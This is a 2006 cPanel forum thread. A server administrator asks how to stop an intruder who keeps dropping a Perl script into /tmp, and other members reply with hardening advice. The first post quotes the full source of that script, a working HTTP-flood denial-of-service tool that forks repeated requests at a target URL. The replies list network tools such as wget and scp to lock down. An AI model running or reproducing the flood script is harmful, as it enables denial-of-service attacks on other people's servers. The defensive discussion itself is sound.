The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

perl script in tmp folder causing server to crash

Discussion in 'General Discussion' started by mher, Jul 11, 2006.

  1. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    Hello

    Hello,

    Every few hours someone is uploading a perl script in my tmp directory and running it and causing the server to overload. The file is pi.pl and i don't know how to trace it. I just kill the process to stop it and make the server load back to normal.

    I tried searching the domlogs for pi.pl but nothing found. I also added this rule to mod_security
    SecFilterSelective THE_REQUEST "tmp "
    SecFilterSelective THE_REQUEST "pi.pl "

    but it's happenning again. I don't know how to stop this. any thoughts?

    The content of pi.pl is this:

    #!/usr/bin/perl
    use LWP::UserAgent;
    use Time::localtime;
    my $d=localtime(time);
    $s1=$d->yday();
    $s2=$d->hour();
    $s3=$d->min();
    $s=((($s1*24)+$s2)*60)+$s3;
    while (1){
    for ($i=1;$i<=$ARGV[1];$i++){
    my $d=localtime(time);
    $s1=$d->yday();
    $s2=$d->hour();
    $s3=$d->min();
    $e=((($s1*24)+$s2)*60)+$s3;
    if (($e-$s)>$ARGV[2]) {
    killpidz();
    exit;
    }
    if ($pid=fork()){
    push(@forked,$pid);
    }else{
    $browser = LWP::UserAgent->new;
    $browser->timeout(5);
    $res=$browser->get($ARGV[0]);
    $data=$res->content;
    exit;
    }}
    killpidz();
    }
    sub killpidz {
    foreach (@forked) {
    chomp;
    waitpid($_,0);
    kill("TERM" => $_)
    }
    undef @forked;
    }
    exit;
     
  2. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Twitter:
    Mounting /tmp with noexec is one option... although, if they are executing the code with a full path, it will still run (most kiddies have figured this out by now).

    Harden your php... run in safe_mode, set your open_basedir through "Tweak Security" properly, and use the "disable_functions" setting in your php.ini. I have mine set to "dl,system,exec,passthru,shell_exec".

    chmod 750 /usr/bin/rcp
    chmod 750 /usr/bin/wget
    chmod 750 /usr/bin/lynx
    chmod 750 /usr/bin/links
    chmod 750 /usr/bin/scp

    Lock down your mod_security. There is an extensive list of mod_sec rules here on the forum. Run a search for mod_security and they will come up.

    compile php to use phpSUexec. This will force the files to run as their owners, instead of as nobody. This may not exactly stop the files from ending up in your /tmp folder, but it WILL assign them to the owner that put them there, and allow you to easily track down the site responsible.

    Check for easily exploitable systems like phpBB installed on the server. If there are any, assure they are up to date on the latest patches and security fixes. Some site admins get lazy about this, and it causes the server owners nothing but headaches.

    There are a few posts around here about how to secure your server. I suggest checking into them... and I seriously suggest looking into Chirpy's cPanel Firewall module. It rocks hard, and has settings that will tell you when rogue scripts start causing trouble, and will even tell you who owns them, and what files they are using to run. ;)
     
  3. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    Thank you. Is there a way to disable LWP::UserAgent in perl?
     
  4. katmai

    katmai Well-Known Member

    Joined:
    Mar 13, 2006
    Messages:
    526
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brno, Czech Republic
    i suggest an admin to remove the code, just because we don't know who might browse the forum ...
     
  5. avijit

    avijit Well-Known Member

    Joined:
    Jul 26, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    Install mod_sec and add a moderate mod_sec ruleset to prevent this.
     
  6. Marty

    Marty Well-Known Member

    Joined:
    Oct 10, 2001
    Messages:
    630
    Likes Received:
    1
    Trophy Points:
    18
    I think if you will read the posters post, you will find that he has already done that.
     
Loading...

Share This Page